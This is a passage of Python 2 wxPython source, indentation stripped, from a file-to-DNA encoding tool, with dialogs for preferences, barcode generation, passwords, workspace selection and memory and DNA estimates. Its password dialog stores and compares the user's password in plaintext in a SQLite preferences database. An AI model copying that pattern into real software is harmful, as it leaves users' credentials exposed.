self.hBoxb.Add(self.txtb,proportion = 2,flag = wx.EXPAND)
self.vBox.Add(self.hBoxb , flag = wx.TOP | wx.BOTTOM , border = 7)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
try:
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
except IOError:
#"""Permission Error"""
#wx.MessageDialog(self,'Permission Denied. Please start the software in administrator mode.', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
#sys.exit(0)
shutil.copyfile(PATH + '/../icons/barcode.png',self.WORKSPACE_PATH + '/barcode/barcode.png')
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
if not os.path.isdir(self.WORKSPACE_PATH + '/.temp'):
os.mkdir(self.WORKSPACE_PATH +'/.temp')
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox.Add(self.imageCtrl,flag = wx.LEFT | wx.ALIGN_CENTER_HORIZONTAL , border = 10)
head = wx.StaticText(self ,label = PREF_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
if 'darwin' in sys.platform:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(570)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
else:
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(550)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label="Save")
self.barcodeBut = wx.Button(self,label="Generate Barcode")
self.cancelBut = wx.Button(self,label="Close")
self.hBoxe.Add(self.saveBut, flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.barcodeBut, flag = wx.RIGHT | wx.LEFT , border = 10)
self.hBoxe.Add(self.cancelBut, flag = wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.TOP | wx.ALIGN_CENTER_HORIZONTAL | wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
self.Layout()
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.barcodeBut.Bind(wx.EVT_BUTTON,self.generate)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
#self.browBut.Bind(wx.EVT_BUTTON,self.onChoose)
#self.SetSize((500,450))
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = (cur.execute('SELECT * FROM prefs where id = 1').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txta.WriteText(string)
string = (cur.execute('SELECT * FROM prefs where id = 2').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txtc.WriteText(string)
string = (cur.execute('SELECT * FROM prefs where id = 3').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txtd.WriteText(string)
if con:
con.close()
def onChoose(self,e):
locationSelector = wx.DirDialog(self,"Please select default location to save all your file",style = wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if locationSelector.ShowModal() == wx.ID_OK:
paths = locationSelector.GetPath()
if "win" in sys.platform:
self.savePath = paths
elif "linux" in sys.platform:
self.savePath = unicodedata.normalize('NFKD', paths).encode('ascii','ignore')
self.txtf.Clear()
self.txtf.WriteText(self.savePath)
else:
self.savePath = None
def save(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
try:
cur = con.cursor()
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txta.GetString(0,self.txta.GetLastPosition()),1))
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtc.GetString(0,self.txtc.GetLastPosition()),2))
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),3))
cur.execute('UPDATE prefs SET details = "true" WHERE id = 4')
#if not self.txtf.IsEmpty():
# cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtf.GetString(0,self.txtf.GetLastPosition()),7))
#else:
# cur.execute('UPDATE prefs SET details = "None" WHERE id = 7')
con.commit()
except sqlite3.OperationalError:
DATABASE_ERROR = True
if con:
con.close()
self.Destroy()
def generate(self,e):
barcodeGenerator.generate(self.txta.GetString(0,self.txta.GetLastPosition()) + "-" + self.txtb.GetString(0,self.txtb.GetLastPosition())+ "-" + self.txtc.GetString(0,self.txtc.GetLastPosition()) + "-" + self.txtd.GetString(0,self.txtd.GetLastPosition()),self.WORKSPACE_PATH + "/barcode/")
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl.SetBitmap(wx.BitmapFromImage(img))
self.Refresh()
def cancel(self,e):
self.Destroy()
#dialog used to set or change password
class setPasswordDialog(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if "win" in sys.platform and not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Please Enter your password",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Old Password :\t\t")
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if string == 'false':
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_READONLY)
else:
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxa.Add(path,1,wx.EXPAND)
self.hBoxa.Add(self.txta,3,wx.EXPAND | wx.RIGHT ,border = 10)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " New Password :\t ")
self.txtc = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxc.Add(path, 1, flag = wx.EXPAND)
self.hBoxc.Add(self.txtc, 3, wx.EXPAND | wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Confirm Password : ")
self.txtd = wx.TextCtrl(self,name = "hBox1",style = wx.TE_PASSWORD)
self.hBoxd.Add(path, 1, flag = wx.EXPAND)
self.hBoxd.Add(self.txtd, 3, flag = wx.EXPAND | wx.RIGHT,border = 10)
self.vBox.Add(self.hBoxd,flag = wx.TOP | wx.BOTTOM, border = 7)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = "It is recommended that you use password to keep your data private")
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.RIGHT , border = 5)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.cancelBut = wx.Button(self,label=" Cancel ")
self.hBoxe.Add(self.saveBut,flag = wx.RIGHT | wx.BOTTOM, border = 10)
self.hBoxe.Add(self.cancelBut,flag = wx.LEFT | wx.BOTTOM, border = 10)
self.vBox.Add(self.hBoxe, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform or 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Please Enter your password",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Old Password :\t")
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
if string == 'false':
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_READONLY)
else:
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxa.Add(path,1,wx.EXPAND)
self.hBoxa.Add(self.txta,3,wx.EXPAND | wx.LEFT , border = 10)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " New Password :\t")
self.hBoxc.Add(path,proportion =1,flag = wx.EXPAND)
self.txtc = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxc.Add(self.txtc,proportion = 3 ,flag = wx.EXPAND | wx.LEFT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Confirm Password :")
self.hBoxd.Add(path,1,flag = wx.EXPAND)
self.txtd = wx.TextCtrl(self,name = "hBox1",style = wx.TE_PASSWORD)
self.hBoxd.Add(self.txtd,3,flag = wx.EXPAND)
self.vBox.Add(self.hBoxd,flag = wx.TOP | wx.BOTTOM, border = 7)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = "It is recommended that you use password to keep your data private")
if not 'darwin' in sys.platform:
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.ALIGN_CENTER_HORIZONTAL)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.cancelBut = wx.Button(self,label=" Cancel ")
self.hBoxe.Add(self.saveBut,flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.cancelBut,flag = wx.LEFT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.SetSizer(self.vBox)
self.SetSize((570,250))
def save(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
try:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
if string == 'true':
oldPassword = (cur.execute('SELECT * FROM prefs where id = 6').fetchone())[1]
if "linux" in sys.platform:
oldPassword = unicodedata.normalize('NFKD', oldPassword).encode('ascii','ignore')
if self.txta.GetString(0,self.txta.GetLastPosition()) != oldPassword or self.txtc.GetString(0,self.txtc.GetLastPosition()) != self.txtd.GetString(0,self.txtd.GetLastPosition()):
wx.MessageBox('Your passwords do not match, or your old password may be wrong', 'Information!',wx.OK | wx.ICON_INFORMATION)
else:
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),6))
con.execute('UPDATE prefs SET details = ? WHERE id = ?',("true",5))
self.Destroy()
wx.MessageBox('Your Password has been updated!!', 'Information!',wx.OK |wx.ICON_INFORMATION)
else:
if self.txtc.GetString(0,self.txtc.GetLastPosition()) != self.txtd.GetString(0,self.txtd.GetLastPosition()):
wx.MessageBox('Your passwords do not match', 'Information!',wx.OK | wx.ICON_INFORMATION)
else:
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),6))
con.execute('UPDATE prefs SET details = ? WHERE id = ?',("true",5))
self.Destroy()
wx.MessageBox('Your Password has been updated!!', 'Information!',wx.OK |wx.ICON_INFORMATION)
con.commit()
except sqlite3.OperationalError:
DATABASE_ERROR = True
self.Destroy()
if con:
con.close()
def cancel(self,e):
self.Destroy()
#dialog used to select encode /decode while the software starts
class chooseDialog(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
head = wx.StaticText(self ,label = "Please Select your Choice",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL, border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.encodeBut = wx.Button(self,label = "File To DNA(Encode)")
self.decodeBut = wx.Button(self,label = "DNA To File(Decode)")
self.vBox.Add(self.encodeBut,flag = wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL ,border = 10,proportion = 1)
self.vBox.Add(self.decodeBut,flag = wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL ,border = 10,proportion = 1)
self.SetSizer(self.vBox)
self.SetSize((300,150))
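# Workspace selection dialog: known workspaces are listed from workspace.db; the chosen path and the
# "use as default" flag are stored in prefs.db.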
class workspaceLauncher(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
header = wx.TextCtrl(self,name = "hBox",size = (350,60),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(header,flag = wx.EXPAND | wx.ALL , border = 10)
header.WriteText(HEADER_TEXT)
head = wx.StaticText(self ,label = "Select your Workspace",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head, flag = wx.EXPAND | wx.TOP | wx.LEFT, border = 10)
line1 = wx.StaticLine(self, size=(350,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.cbList = []
if "win" in sys.platform and not 'darwin' in sys.platform:
con = sqlite3.connect(os.path.join(PATH, '..', 'database', 'workspace.db'))
elif "linux" in sys.platform or 'darwin' in sys.platform:
con = sqlite3.connect(PATH + '/../database/workspace.db')
try:
cur = con.cursor()
for i in cur.execute('SELECT * FROM workspace'):
if "linux" in sys.platform:
self.cbList.append(unicodedata.normalize('NFKD', i[1]).encode('ascii','ignore'))
elif "win" in sys.platform:
self.cbList.append(i[1])
except:
LIST_ERROR = True
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
self.defaultWorkspace = cur.execute('SELECT * FROM prefs WHERE id = 7').fetchone()[1]
if "linux" in sys.platform:
self.defaultWorkspace = unicodedata.normalize('NFKD', self.defaultWorkspace).encode('ascii','ignore')
if self.defaultWorkspace == "True":
self.defaultWorkspace = True
else:
self.defaultWorkspace = False
con.close()
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.cb = wx.ComboBox(self, -1, size = (350,30), choices = self.cbList, style = wx.CB_DROPDOWN)
self.hBox.Add(self.cb, proportion = 4, flag = wx.LEFT | wx.TOP, border = 5)
self.browBut = wx.Button(self , label = "Browse")
self.hBox.Add(self.browBut, proportion = 1, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.RIGHT | wx.TOP , border = 5)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.defCheckBox = wx.CheckBox(self, -1, label = "Set this workspace as default and don't ask me again", style = wx.CHK_2STATE)
self.hBox1.Add(self.defCheckBox, flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 10)
self.vBox.Add(self.hBox1, proportion = 1, flag = wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.BOTTOM, border = 20)
self.defCheckBox.SetValue(self.defaultWorkspace)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
self.okBut = wx.Button(self, wx.ID_OK,size = (100,30))
self.cancelBut = wx.Button(self, wx.ID_CANCEL, size = (100,30))
self.hBox2.Add(self.okBut, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT | wx.BOTTOM, border = 10)
self.hBox2.Add(self.cancelBut, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.BOTTOM, border = 10)
self.vBox.Add(self.hBox2,flag = wx.ALIGN_CENTER)
self.SetSizerAndFit(self.vBox)
self.browBut.Bind(wx.EVT_BUTTON,self.onChoose)
self.okBut.Bind(wx.EVT_BUTTON,self.okay)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.isNew = False
self.savePath = None
#This is necessary since we dont want to close software when cancel button is pressed in case of SWITCH WORKSPACE
if id == 102:
self.cancelBut.Disable()
def onChoose(self,e):
locationSelector = wx.DirDialog(self,"Please select some location to save all your file",style = wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if locationSelector.ShowModal() == wx.ID_OK:
paths = locationSelector.GetPath()
if "win" in sys.platform:
self.savePath = paths
elif "linux" in sys.platform:
self.savePath = unicodedata.normalize('NFKD', paths).encode('ascii','ignore')
self.cb.SetValue(self.savePath)
else:
self.savePath = None
def okay(self,e):
if self.savePath == None:
if "win" in sys.platform:
if self.cb.GetValue() == "":
wx.MessageDialog(self,'Please select some Folder for Workspace', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
else:
self.savePath = self.cb.GetValue()
elif "linux" in sys.platform:
if unicodedata.normalize('NFKD', self.cb.GetValue()).encode('ascii','ignore') == "":
wx.MessageDialog(self,'Please select some Folder for Workspace', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
else:
self.savePath = unicodedata.normalize('NFKD', self.cb.GetValue()).encode('ascii','ignore')
if self.savePath in self.cbList:
self.isNew = False
else:
self.isNew = True
if self.defCheckBox.IsChecked():
self.defaultWorkspace = True
else:
self.defaultWorkspace = False
if "win" in sys.platform and not 'darwin' in sys.platform:
con1 = sqlite3.connect(os.path.join(PATH, '..', 'database', 'prefs.db'))
con = sqlite3.connect(os.path.join(PATH, '..', 'database', 'workspace.db'))
elif "linux" in sys.platform or 'darwin' in sys.platform:
con1 = sqlite3.connect(PATH + '/../database/prefs.db')
con = sqlite3.connect(PATH + '/../database/workspace.db')
try:
cur1 = con1.cursor()
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(str(self.defaultWorkspace),7))
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.savePath,8))
count = cur1.execute('SELECT * FROM prefs WHERE id = 9').fetchone()[1]
if "linux" in sys.platform:
count = unicodedata.normalize('NFKD', count).encode('ascii','ignore')
if self.isNew:
count = str(int(count) + 1)
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(count,9))
con1.commit()
except:
print "PREF_ERROR"
DB_ERROR_PREFS = True
con1.close()
if self.isNew:
try:
cur = con.cursor()
cur.execute('INSERT INTO workspace VALUES(?,?)',(int(count),self.savePath))
con.commit()
con.close()
except sqlite3.OperationalError:
cur = con.cursor()
#cur.execute('DROP TABLE IF EXISTS workspace')
cur.execute('CREATE TABLE workspace(id INT,path TEXT NOT NULL)')
cur.execute('INSERT INTO workspace VALUES(?,?)',(1,self.savePath))
con.commit()
con.close()
self.Destroy()
def cancel(self,e):
sys.exit(0)
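# memEstimator: rough estimate of the memory and the amount of DNA needed to encode a chosen file.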
class memEstimator(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Memory Estimation",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
head = wx.StaticText(self ,label = "Memory Estimation",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a data file from your Computer")
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL | wx.RIGHT,proportion = 2,border = 10)
self.vBox.Add(self.hBox)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
if not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation,the actual\nvalues may vary",style = wx.ALIGN_CENTRE_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation,the actual\nvalues may vary",style = wx.ALIGN_CENTRE_HORIZONTAL)
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
#head.Wrap(440)
self.vBox.Add(head ,flag = wx.TOP | wx.LEFT | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.butOk = wx.Button(self , label = "OK")
self.vBox.Add(self.butOk,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.BOTTOM , border = 10)
self.SetSizerAndFit(self.vBox)
#self.SetSize((370,470))
self.butChoose.Bind(wx.EVT_BUTTON,self.onChoose)
self.butOk.Bind(wx.EVT_BUTTON,self.ok)
def onChoose(self,e):
self.txt.Clear()
fileSelector = wx.FileDialog(self, message="Choose a file",defaultFile="",style=wx.OPEN | wx.MULTIPLE | wx.CHANGE_DIR )
if fileSelector.ShowModal() == wx.ID_OK:
paths = fileSelector.GetPaths()
if "win" in sys.platform and not 'darwin' in sys.platform:
path = paths[0]
elif "linux" in sys.platform or 'darwin' in sys.platform:
path = unicodedata.normalize('NFKD', paths[0]).encode('ascii','ignore')
length = os.path.getsize(path)
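# Rough heuristics used below: the encoded DNA string is taken to be about 5.5 nucleotides
# per input byte, and memory figures are reported in MB (CHUNK_SIZE bytes per MB).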
dnaLength = int(5.5 * length)
dnaStringMem = 6 * length
dnaStringMem = dnaStringMem/CHUNK_SIZE
if dnaStringMem == 0:
dnaStringMem = 1
dnaListMem = (((dnaLength)/25) - 3) * 117
dnaListMem = dnaListMem/CHUNK_SIZE
if dnaListMem == 0:
dnaListMem = 1
errorCorrectionMem = 15 * length
line1 = "File Size(bytes) : \t\t" + str(length)
line2 = "Size of DNA String : \t" + str(dnaLength)
line3 = "Free Memory Required : \n" + "To genrate DNA String :\t" + str(dnaStringMem) + " MB\n" + "To generate DNA Chunks :\t" + str(dnaListMem) + " MB\n"
line4 = "Amount of DNA Required : \t" + str(length / (455 * (10.0 ** 18)))
text = line1 + "\n\n" + line2 + "\n\n" + line3 + "\n\n" + line4 + " gms\n\n" + "File Selected : " + path
self.txt.WriteText(text)
fileSelector.Destroy()
def ok(self,e):
self.Destroy()
class estimator(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if "win" in sys.platform and not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Biochemical Property Estimator",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA file from your Computer",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter salt concentration(mM) :",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration")
self.hBox1.Add(text1, 1, wx.EXPAND)
self.hBox1.Add(self.saltText, 2, wx.EXPAND | wx.LEFT , border = 15)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter cost for a base($) : \t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price")
self.hBox2.Add(text1, 1, wx.EXPAND)
self.hBox2.Add(self.priceText, 2, wx.EXPAND | wx.LEFT, border = 15)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 5)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = " Calculate ")
self.butCancel = wx.Button(self, label = " Close ")
self.butSave = wx.Button(self , label = " Save ")
self.hBox3.Add(self.butCalc, 1, wx.RIGHT , border = 5)
self.hBox3.Add(self.butSave, 1, wx.LEFT | wx.RIGHT , border = 5)
